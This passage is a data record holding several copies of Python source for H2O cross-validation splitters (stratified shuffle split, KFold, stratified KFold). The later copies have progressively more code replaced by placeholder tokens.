The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n \"\"\"Shuffle splitter used for ``h2o_train_test_split`` when stratified\n option is specified. This shuffle split class will perform stratification.\n \"\"\"\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
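_make_test_folds, which closes each step above, labels every row with a test-fold id while holding class ratios steady across folds. The stand-in below uses a simple per-class round-robin instead of the per-class KFold plumbing of the real code, so it is a simplification for illustration, not a drop-in replacement:

import numpy as np

target = np.array(['a', 'a', 'a', 'a', 'b', 'b', 'a', 'b', 'b', 'a'])
n_folds = 3

test_folds = np.empty(len(target), dtype=int)
for cls in np.unique(target):
    positions = np.where(target == cls)[0]
    # Cycling fold ids inside each class keeps every fold's class mix
    # close to the overall distribution.
    test_folds[positions] = np.arange(len(positions)) % n_folds

for i in range(n_folds):
    print(i, np.where(test_folds == i)[0])  # members of test fold i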
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n <docstring token>\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedShuffleSplit, self).split(frame, y)\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n <docstring token>\n\n def _iter_indices(self, frame, y):\n \"\"\"Iterate the indices with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n\n Returns\n -------\n\n train : np.ndarray, shape=(n_samples,)\n The train indices\n\n test : np.ndarray, shape=(n_samples,)\n The test indices\n \"\"\"\n n_samples = frame.shape[0]\n n_train, n_test = _validate_shuffle_split(n_samples, self.test_size,\n self.train_size)\n y = _val_y(y)\n target = np.asarray(frame[y].as_data_frame(use_pandas=True)[y].tolist()\n )\n classes, y_indices = np.unique(target, return_inverse=True)\n n_classes = classes.shape[0]\n class_counts = bincount(y_indices)\n if np.min(class_counts) < 2:\n raise ValueError(\n 'The least populated class in y has only 1 member, which is too few. 
The minimum number of labels for any class cannot be less than 2.'\n )\n if n_train < n_classes:\n raise ValueError(\n 'The train_size=%d should be greater than or equal to the number of classes=%d'\n % (n_train, n_classes))\n if n_test < n_classes:\n raise ValueError(\n 'The test_size=%d should be greater than or equal to the number of classes=%d'\n % (n_test, n_classes))\n rng = check_random_state(self.random_state)\n p_i = class_counts / float(n_samples)\n n_i = np.round(n_train * p_i).astype(int)\n t_i = np.minimum(class_counts - n_i, np.round(n_test * p_i).astype(int)\n )\n for _ in range(self.n_splits):\n train = []\n test = []\n for i, class_i in enumerate(classes):\n permutation = rng.permutation(class_counts[i])\n perm_indices_class_i = np.where(target == class_i)[0][\n permutation]\n train.extend(perm_indices_class_i[:n_i[i]])\n test.extend(perm_indices_class_i[n_i[i]:n_i[i] + t_i[i]])\n if len(train) + len(test) < n_train + n_test:\n missing_indices = np.where(bincount(train + test, minlength\n =len(target)) == 0)[0]\n missing_indices = rng.permutation(missing_indices)\n n_missing_train = n_train - len(train)\n n_missing_test = n_test - len(test)\n if n_missing_train > 0:\n train.extend(missing_indices[:n_missing_train])\n if n_missing_test > 0:\n test.extend(missing_indices[-n_missing_test:])\n train = rng.permutation(train)\n test = rng.permutation(test)\n yield train, test\n <function token>\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
Got %s (type=%s)' % (str(\n shuffle), type(shuffle)))\n self.n_folds = n_folds\n self.shuffle = shuffle\n self.random_state = random_state\n\n @overrides(H2OBaseCrossValidator)\n def split(self, frame, y=None):\n \"\"\"Split the frame.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string, optional (default=None)\n The column to stratify.\n \"\"\"\n frame = check_frame(frame, copy=False)\n n_obs = frame.shape[0]\n if self.n_folds > n_obs:\n raise ValueError('Cannot have n_folds greater than n_obs')\n for train, test in super(_H2OBaseKFold, self).split(frame, y):\n yield train, test\n\n @overrides(H2OBaseCrossValidator)\n def get_n_splits(self):\n \"\"\"Get the number of splits or folds.\n\n Returns\n -------\n\n n_folds : int\n The number of folds\n \"\"\"\n return self.n_folds\n\n\nclass H2OKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OKFold, self).__init__(n_folds, shuffle, random_state)\n\n @overrides(_H2OBaseKFold)\n def _iter_test_indices(self, frame, y=None):\n n_obs = frame.shape[0]\n indices = np.arange(n_obs)\n if self.shuffle:\n check_random_state(self.random_state).shuffle(indices)\n n_folds = self.n_folds\n fold_sizes = n_obs // n_folds * np.ones(n_folds, dtype=np.int)\n fold_sizes[:n_obs % n_folds] += 1\n current = 0\n for fold_size in fold_sizes:\n start, stop = current, current + fold_size\n yield indices[start:stop]\n current = stop\n\n\nclass H2OStratifiedKFold(_H2OBaseKFold):\n \"\"\"K-folds cross-validator for an H2OFrame with\n stratified splits.\n \n Parameters\n ----------\n\n n_folds : int, optional (default=3)\n The number of splits\n\n shuffle : bool, optional (default=False)\n Whether to shuffle indices\n\n random_state : int or RandomState, optional (default=None)\n The random state for the split\n \"\"\"\n\n def __init__(self, n_folds=3, shuffle=False, random_state=None):\n super(H2OStratifiedKFold, self).__init__(n_folds, shuffle, random_state\n )\n\n def split(self, frame, y):\n \"\"\"Split the frame with stratification.\n\n Parameters\n ----------\n\n frame : H2OFrame\n The frame to split\n\n y : string\n The column to stratify.\n \"\"\"\n return super(H2OStratifiedKFold, self).split(frame, y)\n\n def _iter_test_masks(self, frame, y):\n test_folds = self._make_test_folds(frame, y)\n for i in range(self.n_folds):\n yield test_folds == i\n\n def _make_test_folds(self, frame, y):\n if self.shuffle:\n rng = check_random_state(self.random_state)\n else:\n rng = self.random_state\n y = _val_y(y)\n if y is None:\n raise ValueError(\n 'H2OStratifiedKFold requires a target name (got None)')\n target = frame[y].as_data_frame(use_pandas=True)[y].values\n n_samples = target.shape[0]\n unique_y, y_inversed = np.unique(target, return_inverse=True)\n y_counts = bincount(y_inversed)\n min_labels = np.min(y_counts)\n if np.all(self.n_folds > y_counts):\n raise ValueError(\n 'All the n_labels for individual classes are less than %d folds.'\n % self.n_folds, Warning)\n if self.n_folds > min_labels:\n warnings.warn(\n 'The least populated class in y has only %d members, which is too few. 
The minimum number of labels for any class cannot be less than n_folds=%d.'\n % (min_labels, self.n_folds), Warning)\n if SK18:\n per_cls_cvs = [KFold(self.n_folds, shuffle=self.shuffle,\n random_state=rng).split(np.zeros(max(count, self.n_folds))) for\n count in y_counts]\n else:\n per_cls_cvs = [KFold(max(count, self.n_folds), self.n_folds,\n shuffle=self.shuffle, random_state=rng) for count in y_counts]\n test_folds = np.zeros(n_samples, dtype=np.int)\n for test_fold_indices, per_cls_splits in enumerate(zip(*per_cls_cvs)):\n for cls, (_, test_split) in zip(unique_y, per_cls_splits):\n cls_test_folds = test_folds[target == cls]\n test_split = test_split[test_split < len(cls_test_folds)]\n cls_test_folds[test_split] = test_fold_indices\n test_folds[target == cls] = cls_test_folds\n return test_folds\n", "<import token>\n<code token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<function token>\n<class token>\n<function token>\n<function token>\n<class token>\n<class token>\n\n\nclass H2OStratifiedShuffleSplit(H2OBaseShuffleSplit):\n <docstring token>\n <function token>\n <function token>\n\n\nclass _H2OBaseKFold(six.with_metaclass(ABCMeta, H2OBaseCrossValidator)):\n \"\"\"Base class for KFold and Stratified KFold.\n \n Parameters\n ----------\n\n n_folds : int\n The number of splits\n\n shuffle : bool\n Whether to shuffle indices\n\n random_state : int or RandomState\n The random state for the split\n \"\"\"\n\n @abstractmethod\n def __init__(self, n_folds, shuffle, random_state):\n if not isinstance(n_folds, numbers.Integral):\n raise ValueError(\n 'n_folds must be of Integral type. %s of type %s was passed' %\n (n_folds, type(n_folds)))\n n_folds = int(n_folds)\n if n_folds <= 1:\n raise ValueError(\n 'k-fold cross-validation requires at least one train/test split by setting n_folds=2 or more'\n )\n if shuffle not in [True, False]:\n raise TypeError(\n 'shuffle must be True or False. 
